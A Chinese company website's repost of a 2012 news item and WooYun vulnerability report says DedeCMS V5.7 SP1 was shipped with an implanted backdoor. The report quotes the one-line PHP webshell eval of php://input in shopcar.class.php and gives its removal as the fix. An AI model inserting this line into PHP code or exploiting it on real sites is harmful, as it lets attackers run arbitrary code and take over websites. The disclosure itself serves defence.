您好,欢迎光临贵州尊迅科技有限公司官网!我们提供网站建设-手机APP定制-应用软件定制开发-微信营销网站-大数据-物联网-云计算等互联网+整体解决方案。
服务热线
0851-28420620
客服
您当前的位置:首页 > 最新动态 > 行业新闻 > 正文

Dedecms疑似被植入后门 上传PHP后门可控制整个网站

作者:admin发布时间:2012-03-21

Admin5站长网2月21日消息,昨日乌云漏洞报告平台(http://www.wooyun.org/)发布漏洞报告,称国内知名开源CMS软件Dedecms被入侵种植后门,影响使用dedecms的网站和企业,后门代码在/include/shopcar.class.php中,希望直接使用dedecms又未作审计的网站速度处理。360网站安全检测官方微博称经过工程师的测试,可以上传PHP后门来控制整个网站。目前已经将该后门加入到webscan网站安全扫描平台扫描库中,希望各网站及时进行扫描确认。

织梦内容管理系统(DedeCms)早期由IT柏拉图个人开发, 以简单、实用、开源闻名,受到广大个人站长的青睐。DedeCms站长用户众多,目前其官方还未对漏洞做出回应。希望广大使用Dedecms的站长能及时对网站进行安全检测,做好漏洞防范,等待官方给出解决办法。

  漏洞概要

缺陷编号: WooYun-2012-05416

漏洞标题: Dedecms疑似被植入后门

相关厂商: Dedecms

漏洞作者: jsbug

提交时间: 2012-03-20

公开时间: 2012-03-20

漏洞类型: 成功的入侵事件

危害等级: 高

自评Rank: 10

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org

分享漏洞: 腾讯微博 新浪微博 Twitter 网易微博 豆瓣

  漏洞详情

  披露状态:

2012-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开

2012-03-20: 厂商已经主动忽略漏洞,细节向公众公开

  简要描述:

DedeCMS V5.7 SP1正式版

UTF-8 GBK版本疑似被植入一句话后门

前几日下载并不存在此代码

  详细说明:

shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

 

 

  漏洞证明:

shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

 

 

  修复方案:

删除@eval(file_get_contents('php://input'));